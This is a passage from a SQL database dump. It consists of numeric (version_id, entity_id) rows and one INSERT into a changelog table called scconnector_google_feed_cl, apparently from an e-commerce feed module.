(8568, 435),
(8569, 435),
(8570, 435),
(8571, 435),
(8572, 435),
(8573, 435),
(8574, 436),
(8575, 436),
(8576, 436),
(8577, 436),
(8578, 436),
(8579, 436),
(8580, 437),
(8581, 437),
(8582, 437),
(8583, 437),
(8584, 437),
(8585, 437),
(8586, 438),
(8587, 438),
(8588, 438),
(8589, 438),
(8590, 438),
(8591, 438),
(8592, 439),
(8593, 439),
(8594, 439),
(8595, 439),
(8596, 439),
(8597, 439),
(8598, 440),
(8599, 440),
(8600, 440),
(8601, 440),
(8602, 440),
(8603, 440),
(8604, 441),
(8605, 441),
(8606, 441),
(8607, 441),
(8608, 441),
(8609, 441),
(8610, 442),
(8611, 442),
(8612, 442),
(8613, 442),
(8614, 442),
(8615, 442),
(8616, 443),
(8617, 443),
(8618, 443),
(8619, 443),
(8620, 443),
(8621, 443),
(8622, 443),
(8623, 443),
(8624, 443),
(8625, 444),
(8626, 444),
(8627, 444),
(8628, 444),
(8629, 444),
(8630, 444),
(8631, 445),
(8632, 445),
(8633, 445),
(8634, 445),
(8635, 445),
(8636, 445),
(8637, 446),
(8638, 446),
(8639, 446),
(8640, 446),
(8641, 446),
(8642, 446),
(8643, 447),
(8644, 447),
(8645, 447),
(8646, 447),
(8647, 447),
(8648, 447),
(8649, 448),
(8650, 448),
(8651, 448),
(8652, 448),
(8653, 448),
(8654, 448),
(8655, 449),
(8656, 449),
(8657, 449),
(8658, 449),
(8659, 449),
(8660, 449),
(8661, 450),
(8662, 450),
(8663, 450),
(8664, 450),
(8665, 450),
(8666, 450),
(8667, 451),
(8668, 451),
(8669, 451),
(8670, 451),
(8671, 451),
(8672, 451),
(8673, 452),
(8674, 452),
(8675, 452),
(8676, 452),
(8677, 452),
(8678, 452),
(8679, 453),
(8680, 453),
(8681, 453),
(8682, 453),
(8683, 453),
(8684, 453),
(8685, 454),
(8686, 454),
(8687, 454),
(8688, 454),
(8689, 454),
(8690, 454),
(8691, 455),
(8692, 455),
(8693, 455),
(8694, 455),
(8695, 455),
(8696, 455),
(8697, 456),
(8698, 456),
(8699, 456),
(8700, 456),
(8701, 456),
(8702, 456),
(8703, 457),
(8704, 457),
(8705, 457),
(8706, 457),
(8707, 457),
(8708, 457),
(8709, 458),
(8710, 458),
(8711, 458),
(8712, 458),
(8713, 458),
(8714, 458),
(8715, 459),
(8716, 459),
(8717, 459),
(8718, 459),
(8719, 459),
(8720, 459),
(8721, 459),
(8722, 459),
(8723, 459),
(8724, 360),
(8725, 360),
(8726, 361),
(8727, 361),
(8728, 362),
(8729, 362),
(8730, 363),
(8731, 364),
(8732, 364),
(8733, 365),
(8734, 365),
(8735, 366),
(8736, 366),
(8737, 367),
(8738, 367),
(8739, 368),
(8740, 368),
(8741, 369),
(8742, 369),
(8743, 370),
(8744, 370),
(8745, 371),
(8746, 371),
(8747, 372),
(8748, 372),
(8749, 373),
(8750, 373),
(8751, 374),
(8752, 374),
(8753, 375),
(8754, 375),
(8755, 376),
(8756, 376),
(8757, 377),
(8758, 377),
(8759, 378),
(8760, 378),
(8761, 379),
(8762, 380),
(8763, 380),
(8764, 381),
(8765, 381),
(8766, 382),
(8767, 382),
(8768, 383),
(8769, 383),
(8770, 384),
(8771, 384),
(8772, 385),
(8773, 385),
(8774, 386),
(8775, 386),
(8776, 387),
(8777, 387),
(8778, 388),
(8779, 388),
(8780, 389),
(8781, 389),
(8782, 390),
(8783, 390),
(8784, 391),
(8785, 391),
(8786, 392),
(8787, 392),
(8788, 393),
(8789, 393),
(8790, 394),
(8791, 394),
(8792, 395),
(8793, 396),
(8794, 396),
(8795, 397),
(8796, 397),
(8797, 398),
(8798, 398),
(8799, 399),
(8800, 399),
(8801, 400),
(8802, 400),
(8803, 401),
(8804, 401),
(8805, 402),
(8806, 402),
(8807, 403),
(8808, 403),
(8809, 404),
(8810, 404),
(8811, 405),
(8812, 405),
(8813, 406),
(8814, 406),
(8815, 407),
(8816, 407),
(8817, 408),
(8818, 408),
(8819, 409),
(8820, 409),
(8821, 410),
(8822, 410),
(8823, 411),
(8824, 412),
(8825, 412),
(8826, 413),
(8827, 413),
(8828, 414),
(8829, 414),
(8830, 415),
(8831, 415),
(8832, 416),
(8833, 416),
(8834, 417),
(8835, 417),
(8836, 418),
(8837, 418),
(8838, 419),
(8839, 419),
(8840, 420),
(8841, 420),
(8842, 421),
(8843, 421),
(8844, 422),
(8845, 422),
(8846, 423),
(8847, 423),
(8848, 424),
(8849, 424),
(8850, 425),
(8851, 425),
(8852, 426),
(8853, 426),
(8854, 427),
(8855, 428),
(8856, 428),
(8857, 429),
(8858, 429),
(8859, 430),
(8860, 430),
(8861, 431),
(8862, 431),
(8863, 432),
(8864, 432),
(8865, 433),
(8866, 433),
(8867, 434),
(8868, 434),
(8869, 435),
(8870, 435),
(8871, 436),
(8872, 436),
(8873, 437),
(8874, 437),
(8875, 438),
(8876, 438),
(8877, 439),
(8878, 439),
(8879, 440),
(8880, 440),
(8881, 441),
(8882, 441),
(8883, 442),
(8884, 442),
(8885, 443),
(8886, 444),
(8887, 444),
(8888, 445),
(8889, 445),
(8890, 446),
(8891, 446),
(8892, 447),
(8893, 447),
(8894, 448),
(8895, 448),
(8896, 449),
(8897, 449),
(8898, 450),
(8899, 450),
(8900, 451),
(8901, 451),
(8902, 452),
(8903, 452),
(8904, 453),
(8905, 453),
(8906, 454),
(8907, 454),
(8908, 455),
(8909, 455),
(8910, 456),
(8911, 456),
(8912, 457),
(8913, 457),
(8914, 458),
(8915, 458),
(8916, 459),
(8917, 460),
(8918, 461),
(8919, 462),
(8920, 463),
(8921, 464),
(8922, 465),
(8923, 466),
(8924, 467),
(8925, 468),
(8926, 469),
(8927, 470),
(8928, 471),
(8929, 472),
(8930, 473),
(8931, 474),
(8932, 475),
(8933, 476),
(8934, 477),
(8935, 478),
(8936, 479),
(8937, 480),
(8938, 481),
(8939, 482),
(8940, 483),
(8941, 484),
(8942, 485),
(8943, 486),
(8944, 487),
(8945, 488),
(8946, 489),
(8947, 490),
(8948, 491),
(8949, 492),
(8950, 493),
(8951, 494),
(8952, 495),
(8953, 496),
(8954, 497),
(8955, 498),
(8956, 499),
(8957, 500),
(8958, 501),
(8959, 502),
(8960, 503),
(8961, 504),
(8962, 505),
(8963, 506),
(8964, 507),
(8965, 508),
(8966, 509),
(8967, 510),
(8968, 511),
(8969, 512),
(8970, 513),
(8971, 514),
(8972, 515),
(8973, 516),
(8974, 517),
(8975, 518),
(8976, 519),
(8977, 520),
(8978, 521),
(8979, 522),
(8980, 523),
(8981, 524),
(8982, 525),
(8983, 526),
(8984, 527),
(8985, 528),
(8986, 529),
(8987, 530),
(8988, 531),
(8989, 532),
(8990, 533),
(8991, 534),
(8992, 535),
(8993, 536),
(8994, 537),
(8995, 538),
(8996, 539),
(8997, 540),
(8998, 541),
(8999, 542),
(9000, 543),
(9001, 544),
(9002, 545),
(9003, 546),
(9004, 547),
(9005, 548),
(9006, 549),
(9007, 550),
(9008, 551),
(9009, 552),
(9010, 553),
(9011, 554),
(9012, 555),
(9013, 556),
(9014, 557),
(9015, 558),
(9016, 559),
(9017, 460),
(9018, 461),
(9019, 461),
(9020, 462),
(9021, 463),
(9022, 464),
(9023, 464),
(9024, 465),
(9025, 466),
(9026, 467),
(9027, 467),
(9028, 468),
(9029, 469),
(9030, 470),
(9031, 470),
(9032, 471),
(9033, 472),
(9034, 473),
(9035, 473),
(9036, 474),
(9037, 475),
(9038, 475),
(9039, 476),
(9040, 477),
(9041, 477),
(9042, 477),
(9043, 478),
(9044, 479),
(9045, 480),
(9046, 480),
(9047, 480),
(9048, 481),
(9049, 482),
(9050, 483),
(9051, 483),
(9052, 483),
(9053, 484),
(9054, 485),
(9055, 486),
(9056, 486),
(9057, 486),
(9058, 487),
(9059, 488),
(9060, 489),
(9061, 489),
(9062, 489),
(9063, 490),
(9064, 491),
(9065, 491),
(9066, 491),
(9067, 492),
(9068, 493),
(9069, 493),
(9070, 494),
(9071, 495),
(9072, 496),
(9073, 496),
(9074, 497),
(9075, 498),
(9076, 499),
(9077, 499),
(9078, 500),
(9079, 501),
(9080, 502),
(9081, 502),
(9082, 503),
(9083, 504),
(9084, 505),
(9085, 505),
(9086, 506),
(9087, 507),
(9088, 507),
(9089, 508),
(9090, 509),
(9091, 510),
(9092, 510),
(9093, 510),
(9094, 511),
(9095, 512),
(9096, 513),
(9097, 513),
(9098, 513),
(9099, 514),
(9100, 515),
(9101, 516),
(9102, 516),
(9103, 516),
(9104, 517),
(9105, 518),
(9106, 519),
(9107, 519),
(9108, 519),
(9109, 520),
(9110, 521),
(9111, 522),
(9112, 522),
(9113, 522),
(9114, 523),
(9115, 523),
(9116, 523),
(9117, 524),
(9118, 524),
(9119, 524),
(9120, 525),
(9121, 526),
(9122, 527),
(9123, 527),
(9124, 527),
(9125, 528),
(9126, 529),
(9127, 530),
(9128, 530),
(9129, 530),
(9130, 531),
(9131, 532),
(9132, 533),
(9133, 533),
(9134, 533),
(9135, 534),
(9136, 535),
(9137, 536),
(9138, 536),
(9139, 536),
(9140, 537),
(9141, 538),
(9142, 539),
(9143, 539),
(9144, 540),
(9145, 540),
(9146, 540),
(9147, 541),
(9148, 542),
(9149, 543),
(9150, 543),
(9151, 543),
(9152, 544),
(9153, 545),
(9154, 546),
(9155, 546),
(9156, 546),
(9157, 547),
(9158, 548),
(9159, 549),
(9160, 549),
(9161, 549),
(9162, 550),
(9163, 551),
(9164, 552),
(9165, 552),
(9166, 552),
(9167, 553),
(9168, 554),
(9169, 555),
(9170, 555),
(9171, 555),
(9172, 556),
(9173, 557),
(9174, 557),
(9175, 558),
(9176, 559),
(9177, 460),
(9178, 460),
(9179, 460),
(9180, 460),
(9181, 460),
(9182, 460),
(9183, 460),
(9184, 461),
(9185, 461),
(9186, 461),
(9187, 461),
(9188, 461),
(9189, 461),
(9190, 461),
(9191, 462),
(9192, 462),
(9193, 462),
(9194, 462),
(9195, 462),
(9196, 462),
(9197, 462),
(9198, 463),
(9199, 463),
(9200, 463),
(9201, 463),
(9202, 463),
(9203, 463),
(9204, 463),
(9205, 464),
(9206, 464),
(9207, 464),
(9208, 464),
(9209, 464),
(9210, 464),
(9211, 464),
(9212, 465),
(9213, 465),
(9214, 465),
(9215, 465),
(9216, 465),
(9217, 465),
(9218, 465),
(9219, 466),
(9220, 466),
(9221, 466),
(9222, 466),
(9223, 466),
(9224, 466),
(9225, 466),
(9226, 467),
(9227, 467),
(9228, 467),
(9229, 467),
(9230, 467),
(9231, 467),
(9232, 467),
(9233, 468),
(9234, 468),
(9235, 468),
(9236, 468),
(9237, 468),
(9238, 468),
(9239, 468),
(9240, 469),
(9241, 469),
(9242, 469),
(9243, 469),
(9244, 469),
(9245, 469),
(9246, 469),
(9247, 470),
(9248, 470),
(9249, 470),
(9250, 470),
(9251, 470),
(9252, 470),
(9253, 470),
(9254, 471),
(9255, 471),
(9256, 471),
(9257, 471),
(9258, 471),
(9259, 471),
(9260, 471),
(9261, 472),
(9262, 472),
(9263, 472),
(9264, 472),
(9265, 472),
(9266, 472),
(9267, 472),
(9268, 473),
(9269, 473),
(9270, 473),
(9271, 473),
(9272, 473),
(9273, 473),
(9274, 473),
(9275, 474),
(9276, 474),
(9277, 474),
(9278, 474),
(9279, 474),
(9280, 474),
(9281, 474),
(9282, 475),
(9283, 475),
(9284, 475),
(9285, 475),
(9286, 475),
(9287, 475),
(9288, 475),
(9289, 475),
(9290, 475),
(9291, 475),
(9292, 475),
(9293, 476),
(9294, 476),
(9295, 476),
(9296, 476),
(9297, 476),
(9298, 476),
(9299, 476),
(9300, 477),
(9301, 477),
(9302, 477),
(9303, 477),
(9304, 477),
(9305, 477),
(9306, 477),
(9307, 478),
(9308, 478),
(9309, 478),
(9310, 478),
(9311, 478),
(9312, 478),
(9313, 478),
(9314, 479),
(9315, 479),
(9316, 479),
(9317, 479),
(9318, 479),
(9319, 479),
(9320, 479),
(9321, 480),
(9322, 480),
(9323, 480),
(9324, 480),
(9325, 480),
(9326, 480),
(9327, 480),
(9328, 481),
(9329, 481),
(9330, 481),
(9331, 481),
(9332, 481),
(9333, 481),
(9334, 481),
(9335, 482),
(9336, 482),
(9337, 482),
(9338, 482),
(9339, 482),
(9340, 482),
(9341, 482),
(9342, 483),
(9343, 483),
(9344, 483),
(9345, 483),
(9346, 483),
(9347, 483),
(9348, 483),
(9349, 484),
(9350, 484),
(9351, 484),
(9352, 484),
(9353, 484),
(9354, 484),
(9355, 484),
(9356, 485),
(9357, 485),
(9358, 485),
(9359, 485),
(9360, 485),
(9361, 485),
(9362, 485),
(9363, 486),
(9364, 486),
(9365, 486),
(9366, 486),
(9367, 486),
(9368, 486),
(9369, 486),
(9370, 487),
(9371, 487),
(9372, 487),
(9373, 487),
(9374, 487),
(9375, 487),
(9376, 487),
(9377, 488),
(9378, 488),
(9379, 488),
(9380, 488),
(9381, 488),
(9382, 488),
(9383, 488),
(9384, 489),
(9385, 489),
(9386, 489),
(9387, 489),
(9388, 489),
(9389, 489),
(9390, 489),
(9391, 490),
(9392, 490),
(9393, 490),
(9394, 490),
(9395, 490),
(9396, 490),
(9397, 490),
(9398, 491),
(9399, 491),
(9400, 491),
(9401, 491),
(9402, 491),
(9403, 491),
(9404, 491),
(9405, 491),
(9406, 491),
(9407, 491),
(9408, 491),
(9409, 492),
(9410, 492),
(9411, 492),
(9412, 492),
(9413, 492),
(9414, 492),
(9415, 492),
(9416, 493),
(9417, 493),
(9418, 493),
(9419, 493),
(9420, 493),
(9421, 493),
(9422, 493),
(9423, 494),
(9424, 494),
(9425, 494),
(9426, 494),
(9427, 494),
(9428, 494),
(9429, 494),
(9430, 495),
(9431, 495),
(9432, 495),
(9433, 495),
(9434, 495),
(9435, 495),
(9436, 495),
(9437, 496),
(9438, 496),
(9439, 496),
(9440, 496),
(9441, 496),
(9442, 496),
(9443, 496),
(9444, 497),
(9445, 497),
(9446, 497),
(9447, 497),
(9448, 497),
(9449, 497),
(9450, 497),
(9451, 498),
(9452, 498),
(9453, 498),
(9454, 498),
(9455, 498),
(9456, 498),
(9457, 498),
(9458, 499),
(9459, 499),
(9460, 499),
(9461, 499),
(9462, 499);
INSERT INTO `scconnector_google_feed_cl` (`version_id`, `entity_id`) VALUES
(9463, 499),
(9464, 499),
(9465, 500),
(9466, 500),
(9467, 500),
(9468, 500),
(9469, 500),
(9470, 500),
(9471, 500),
(9472, 501),
(9473, 501),
(9474, 501),
(9475, 501),
(9476, 501),
(9477, 501),
(9478, 501),
(9479, 502),
(9480, 502),
(9481, 502),
(9482, 502),
(9483, 502),
(9484, 502),
(9485, 502),
(9486, 503),
(9487, 503),
(9488, 503),
(9489, 503),
(9490, 503),
(9491, 503),
(9492, 503),
(9493, 504),
(9494, 504),
(9495, 504),
(9496, 504),
(9497, 504),
(9498, 504),
(9499, 504),
(9500, 505),
(9501, 505),
(9502, 505),
(9503, 505),
(9504, 505),
(9505, 505),
(9506, 505),
(9507, 506),
(9508, 506),
(9509, 506),
(9510, 506),
(9511, 506),
(9512, 506),
(9513, 506),
(9514, 507),
(9515, 507),
(9516, 507),
(9517, 507),
(9518, 507),
(9519, 507),
(9520, 507),
(9521, 507),
(9522, 507),
(9523, 507),
(9524, 507),
(9525, 508),
(9526, 508),
(9527, 508),
(9528, 508),
(9529, 508),
(9530, 508),
(9531, 508),
(9532, 509),
(9533, 509),
(9534, 509),
(9535, 509),
(9536, 509),
(9537, 509),
(9538, 509),
(9539, 510),
(9540, 510),
(9541, 510),
(9542, 510),
(9543, 510),
(9544, 510),
(9545, 510),
(9546, 511),
(9547, 511),
(9548, 511),
(9549, 511),
(9550, 511),
(9551, 511),
(9552, 511),
(9553, 512),
(9554, 512),
(9555, 512),
(9556, 512),
(9557, 512),
(9558, 512),
(9559, 512),
(9560, 513),
(9561, 513),
(9562, 513),
(9563, 513),
(9564, 513),
(9565, 513),
(9566, 513),
(9567, 514),
(9568, 514),
(9569, 514),
(9570, 514),
(9571, 514),
(9572, 514),
(9573, 514),
(9574, 515),
(9575, 515),
(9576, 515),
(9577, 515),
(9578, 515),
(9579, 515),
(9580, 515),
(9581, 516),
(9582, 516),
(9583, 516),
(9584, 516),
(9585, 516),
(9586, 516),
(9587, 516),
(9588, 517),
(9589, 517),
(9590, 517),
(9591, 517),
(9592, 517),
(9593, 517),
(9594, 517),
(9595, 518),
(9596, 518),
(9597, 518),
(9598, 518),
(9599, 518),
(9600, 518),
(9601, 518),
(9602, 519),
(9603, 519),
(9604, 519),
(9605, 519),
(9606, 519),
(9607, 519),
(9608, 519),
(9609, 520),
(9610, 520),
(9611, 520),
(9612, 520),
(9613, 520),
(9614, 520),
(9615, 520),
(9616, 521),
(9617, 521),
(9618, 521),
(9619, 521),
(9620, 521),
(9621, 521),
(9622, 521),
(9623, 522),
(9624, 522),
(9625, 522),
(9626, 522),
(9627, 522),
(9628, 522),
(9629, 522),
(9630, 523),
(9631, 523),
(9632, 523),
(9633, 523),
(9634, 523),
(9635, 523),
(9636, 523),
(9637, 523),
(9638, 523),
(9639, 523),
(9640, 523),
(9641, 524),
(9642, 524),
(9643, 524),
(9644, 524),
(9645, 524),
(9646, 524),
(9647, 524),
(9648, 525),
(9649, 525),
(9650, 525),
(9651, 525),
(9652, 525),
(9653, 525),
(9654, 525),
(9655, 526),
(9656, 526),
(9657, 526),
(9658, 526),
(9659, 526),
(9660, 526),
(9661, 526),
(9662, 527),
(9663, 527),
(9664, 527),
(9665, 527),
(9666, 527),
(9667, 527),
(9668, 527),
(9669, 528),
(9670, 528),
(9671, 528),
(9672, 528),
(9673, 528),
(9674, 528),
(9675, 528),
(9676, 529),
(9677, 529),
(9678, 529),
(9679, 529),
(9680, 529),
(9681, 529),
(9682, 529),
(9683, 530),
(9684, 530),
(9685, 530),
(9686, 530),
(9687, 530),
(9688, 530),
(9689, 530),
(9690, 531),
(9691, 531),
(9692, 531),
(9693, 531),
(9694, 531),
(9695, 531),
(9696, 531),
(9697, 532),
(9698, 532),
(9699, 532),
(9700, 532),
(9701, 532),
(9702, 532),
(9703, 532),
(9704, 533),
(9705, 533),
(9706, 533),
(9707, 533),
(9708, 533),
(9709, 533),
(9710, 533),
(9711, 534),
(9712, 534),
(9713, 534),
(9714, 534),
(9715, 534),
(9716, 534),
(9717, 534),
(9718, 535),
(9719, 535),
(9720, 535),
(9721, 535),
(9722, 535),
(9723, 535),
(9724, 535),
(9725, 536),
(9726, 536),
(9727, 536),
(9728, 536),
(9729, 536),
(9730, 536),
(9731, 536),
(9732, 537),
(9733, 537),
(9734, 537),
(9735, 537),
(9736, 537),
(9737, 537),
(9738, 537),
(9739, 538),
(9740, 538),
(9741, 538),
(9742, 538),
(9743, 538),
(9744, 538),
(9745, 538),
(9746, 539),
(9747, 539),
(9748, 539),
(9749, 539),
(9750, 539),
(9751, 539),
(9752, 539),
(9753, 539),
(9754, 539),
(9755, 539),
(9756, 539),
(9757, 540),
(9758, 540),
(9759, 540),
(9760, 540),
(9761, 540),
(9762, 540),
(9763, 540),
(9764, 541),
(9765, 541),
(9766, 541),
(9767, 541),
(9768, 541),
(9769, 541),
(9770, 541),
(9771, 542),
(9772, 542),
(9773, 542),
(9774, 542),
(9775, 542),
(9776, 542),
(9777, 542),
(9778, 543),
(9779, 543),
(9780, 543),
(9781, 543),
(9782, 543),
(9783, 543),
(9784, 543),
(9785, 544),
(9786, 544),
(9787, 544),
(9788, 544),
(9789, 544),
(9790, 544),
(9791, 544),
(9792, 545),
(9793, 545),
(9794, 545),
(9795, 545),
(9796, 545),
(9797, 545),
(9798, 545),
(9799, 546),
(9800, 546),
(9801, 546),
(9802, 546),
(9803, 546),
(9804, 546),
(9805, 546),
(9806, 547),
(9807, 547),
(9808, 547),
(9809, 547),
(9810, 547),
(9811, 547),
(9812, 547),
(9813, 548),
(9814, 548),
(9815, 548),
(9816, 548),
(9817, 548),
(9818, 548),
(9819, 548),
(9820, 549),
(9821, 549),
(9822, 549),
(9823, 549),
(9824, 549),
(9825, 549),
(9826, 549),
(9827, 550),
(9828, 550),
(9829, 550),
(9830, 550),
(9831, 550),
(9832, 550),
(9833, 550),
(9834, 551),
(9835, 551),
(9836, 551),
(9837, 551),
(9838, 551),
(9839, 551),
(9840, 551),
(9841, 552),
(9842, 552),
(9843, 552),
(9844, 552),
(9845, 552),
(9846, 552),
(9847, 552),
(9848, 553),
(9849, 553),
(9850, 553),
(9851, 553),
(9852, 553),
(9853, 553),
(9854, 553),
(9855, 554),
(9856, 554),
(9857, 554),
(9858, 554),
(9859, 554),
(9860, 554),
(9861, 554),
(9862, 555),
(9863, 555),
(9864, 555),
(9865, 555),
(9866, 555),
(9867, 555),
(9868, 555),
(9869, 555),
(9870, 555),
(9871, 555),
(9872, 555),
(9873, 556),
(9874, 556),
(9875, 556),
(9876, 556),
(9877, 556),
(9878, 556),
(9879, 556),
(9880, 557),
(9881, 557),
(9882, 557),
(9883, 557),
(9884, 557),
(9885, 557),
(9886, 557),
(9887, 558),
(9888, 558),
(9889, 558),
(9890, 558),
(9891, 558),
(9892, 558),
(9893, 558),
(9894, 559),
(9895, 559),
(9896, 559),
(9897, 559),
(9898, 559),
(9899, 559),
(9900, 559),
(9901, 460),
(9902, 461),
(9903, 462),
(9904, 463),
(9905, 464),
(9906, 465),
(9907, 466),
(9908, 467),
(9909, 468),
(9910, 469),
(9911, 470),
(9912, 471),
(9913, 472),
(9914, 473),
(9915, 474),
(9916, 475),
(9917, 476),
(9918, 477),
(9919, 478),
(9920, 479),
(9921, 480),
(9922, 481),
(9923, 482),
(9924, 483),
(9925, 484),
(9926, 485),
(9927, 486),
(9928, 487),
(9929, 488),
(9930, 489),
(9931, 490),
(9932, 491),
(9933, 492),
(9934, 493),
(9935, 494),
(9936, 495),
(9937, 496),
(9938, 497),
(9939, 498),
(9940, 499),
(9941, 500),
(9942, 501),
(9943, 502),
(9944, 503),
(9945, 504),
(9946, 505),
(9947, 506),
(9948, 507),
(9949, 508),
(9950, 509),
(9951, 510),
(9952, 511),
(9953, 512),
(9954, 513),
(9955, 514),
(9956, 515),
(9957, 516),
(9958, 517),
(9959, 518),
(9960, 519),
(9961, 520),
(9962, 521),
(9963, 522),
(9964, 523),
(9965, 524),
(9966, 525),
(9967, 526),
(9968, 527),
(9969, 528),
(9970, 529),
(9971, 530),
(9972, 531),
(9973, 532),
(9974, 533),
(9975, 534),
(9976, 535),
(9977, 536),
(9978, 537),
(9979, 538),
(9980, 539),
(9981, 540),
(9982, 541),
(9983, 542),
(9984, 543),
(9985, 544),
(9986, 545),
(9987, 546),
(9988, 547),
(9989, 548),
(9990, 549),
(9991, 550),
(9992, 551),
(9993, 552),
(9994, 553),
(9995, 554),
(9996, 555),
(9997, 556),
(9998, 557),
(9999, 558),
(10000, 559),
(10001, 460),
(10002, 460),
(10003, 460),
(10004, 460),
(10005, 460),
(10006, 460),
(10007, 461),
(10008, 461),
(10009, 461),
(10010, 461),
(10011, 461),
(10012, 461),
(10013, 462),
(10014, 462),
(10015, 462),
(10016, 462),
(10017, 462),
(10018, 462),
(10019, 463),
(10020, 463),
(10021, 463),
(10022, 463),
(10023, 463),
(10024, 463),
(10025, 464),
(10026, 464),
(10027, 464),
(10028, 464),
(10029, 464),
(10030, 464),
(10031, 465),
(10032, 465),
(10033, 465),
(10034, 465),
(10035, 465),
(10036, 465),
(10037, 466),
(10038, 466),
(10039, 466),
(10040, 466),
(10041, 466),
(10042, 466),
(10043, 467),
(10044, 467),
(10045, 467),
(10046, 467),
(10047, 467),
(10048, 467),
(10049, 468),
(10050, 468),
(10051, 468),
(10052, 468),
(10053, 468),
(10054, 468),
(10055, 469),
(10056, 469),
(10057, 469),
(10058, 469),
(10059, 469),
(10060, 469),
(10061, 470),
(10062, 470),
(10063, 470),
(10064, 470),
(10065, 470),
(10066, 470),
(10067, 471),
(10068, 471),
(10069, 471),
(10070, 471),
(10071, 471),
(10072, 471),
(10073, 472),
(10074, 472),
(10075, 472),
(10076, 472),
(10077, 472),
(10078, 472),
(10079, 473),
(10080, 473),
(10081, 473),
(10082, 473),
(10083, 473),
(10084, 473),
(10085, 474),
(10086, 474),
(10087, 474),
(10088, 474),
(10089, 474),
(10090, 474),
(10091, 475),
(10092, 475),
(10093, 475),
(10094, 475),
(10095, 475),
(10096, 475),
(10097, 475),
(10098, 475),
(10099, 475),
(10100, 476),
(10101, 476),
(10102, 476),
(10103, 476),
(10104, 476),
(10105, 476),
(10106, 477),
(10107, 477),
(10108, 477),
(10109, 477),
(10110, 477),
(10111, 477),
(10112, 478),
(10113, 478),
(10114, 478),
(10115, 478),
(10116, 478),
(10117, 478),
(10118, 479),
(10119, 479),
(10120, 479),
(10121, 479),
(10122, 479),
(10123, 479),
(10124, 480),
(10125, 480),
(10126, 480),
(10127, 480),
(10128, 480),
(10129, 480),
(10130, 481),
(10131, 481),
(10132, 481),
(10133, 481),
(10134, 481),
(10135, 481),
(10136, 482),
(10137, 482),
(10138, 482),
(10139, 482),
(10140, 482),
(10141, 482),
(10142, 483),
(10143, 483),
(10144, 483),
(10145, 483),
(10146, 483),
(10147, 483),
(10148, 484),
(10149, 484),
(10150, 484),
(10151, 484),
(10152, 484),
(10153, 484),
(10154, 485),
(10155, 485),
(10156, 485),
(10157, 485),
(10158, 485),
(10159, 485),
(10160, 486),
(10161, 486),
(10162, 486),
(10163, 486),
(10164, 486),
(10165, 486),
(10166, 487),
(10167, 487),
(10168, 487),
(10169, 487),
(10170, 487),
(10171, 487),
(10172, 488),
(10173, 488),
(10174, 488),
(10175, 488),
(10176, 488),
(10177, 488),
(10178, 489),
(10179, 489),
(10180, 489),
(10181, 489),
(10182, 489),
(10183, 489),
(10184, 490),
(10185, 490),
(10186, 490),
(10187, 490),
(10188, 490),
(10189, 490),
(10190, 491),
(10191, 491),
(10192, 491),
(10193, 491),
(10194, 491),
(10195, 491),
(10196, 491),
(10197, 491),
(10198, 491),
(10199, 492),
(10200, 492),
(10201, 492),
(10202, 492),
(10203, 492),
(10204, 492),
(10205, 493),
(10206, 493),
(10207, 493),
(10208, 493),
(10209, 493),
(10210, 493),
(10211, 494),
(10212, 494),
(10213, 494),
(10214, 494),
(10215, 494),
(10216, 494),
(10217, 495),
(10218, 495),
(10219, 495),
(10220, 495),
(10221, 495),
(10222, 495),
(10223, 496),
(10224, 496),
(10225, 496),
(10226, 496),
(10227, 496),
(10228, 496),
(10229, 497),
(10230, 497),
(10231, 497),
(10232, 497),
(10233, 497),
(10234, 497),
(10235, 498),
(10236, 498),
(10237, 498),
(10238, 498),
(10239, 498),
(10240, 498),
(10241, 499),
(10242, 499),
(10243, 499),
(10244, 499),
(10245, 499),
(10246, 499),
(10247, 500),
(10248, 500),
(10249, 500),
(10250, 500),
(10251, 500),
(10252, 500),
(10253, 501),
(10254, 501),
(10255, 501),
(10256, 501),
(10257, 501),
(10258, 501),
(10259, 502),
(10260, 502),
(10261, 502),
(10262, 502),
(10263, 502),
(10264, 502),
(10265, 503),
(10266, 503),
(10267, 503),
(10268, 503),
(10269, 503),
(10270, 503),
(10271, 504),
(10272, 504),
(10273, 504),
(10274, 504),
(10275, 504),
(10276, 504),
(10277, 505),
(10278, 505),
(10279, 505),
(10280, 505),
(10281, 505),
(10282, 505),
(10283, 506),
(10284, 506),
(10285, 506),
(10286, 506),
(10287, 506),
(10288, 506),
(10289, 507),
(10290, 507),
(10291, 507),
(10292, 507),
(10293, 507),
(10294, 507),
(10295, 507),
(10296, 507),
(10297, 507),
(10298, 508),
(10299, 508),
(10300, 508),
(10301, 508),
(10302, 508),
(10303, 508),
(10304, 509),
(10305, 509),
(10306, 509),
(10307, 509),
(10308, 509),
(10309, 509),
(10310, 510),
(10311, 510),
(10312, 510),
(10313, 510),
(10314, 510),
(10315, 510),
(10316, 511),
(10317, 511),
(10318, 511),
(10319, 511),
(10320, 511),
(10321, 511),
(10322, 512),
(10323, 512),
(10324, 512),
(10325, 512),
(10326, 512),
(10327, 512),
(10328, 513),
(10329, 513),
(10330, 513),
(10331, 513),
(10332, 513),
(10333, 513),
(10334, 514),
(10335, 514),
(10336, 514),
(10337, 514),
(10338, 514),
(10339, 514),
(10340, 515),
(10341, 515),
(10342, 515),
(10343, 515),
(10344, 515),
(10345, 515),
(10346, 516),
(10347, 516),
(10348, 516),
(10349, 516),
(10350, 516),
(10351, 516),
(10352, 517),
(10353, 517),
(10354, 517),
(10355, 517),
(10356, 517),
(10357, 517),
(10358, 518),
(10359, 518),
(10360, 518),
(10361, 518),
(10362, 518),
(10363, 518),
(10364, 519),
(10365, 519),
(10366, 519),
(10367, 519),
(10368, 519),
(10369, 519),
(10370, 520),
(10371, 520),
(10372, 520),
(10373, 520),
(10374, 520),
(10375, 520),
(10376, 521),
(10377, 521),
(10378, 521),
(10379, 521),
(10380, 521),
(10381, 521),
(10382, 522),
(10383, 522),
(10384, 522),
(10385, 522),
(10386, 522),
(10387, 522),
(10388, 523),
(10389, 523),
(10390, 523),
(10391, 523),
(10392, 523),
(10393, 523),
(10394, 523),
(10395, 523),
(10396, 523),
(10397, 524),
(10398, 524),
(10399, 524),
(10400, 524),
(10401, 524),
(10402, 524),
(10403, 525),
(10404, 525),
(10405, 525),
(10406, 525),
(10407, 525),
(10408, 525),
(10409, 526),
(10410, 526),
(10411, 526),
(10412, 526),
(10413, 526),
(10414, 526),
(10415, 527),
(10416, 527),
(10417, 527),
(10418, 527),
(10419, 527),
(10420, 527),
(10421, 528),
(10422, 528),
(10423, 528),
(10424, 528),
(10425, 528),
(10426, 528),
(10427, 529),
(10428, 529),
(10429, 529),
(10430, 529),
(10431, 529),
(10432, 529),
(10433, 530),
(10434, 530),
(10435, 530),
(10436, 530),
(10437, 530),
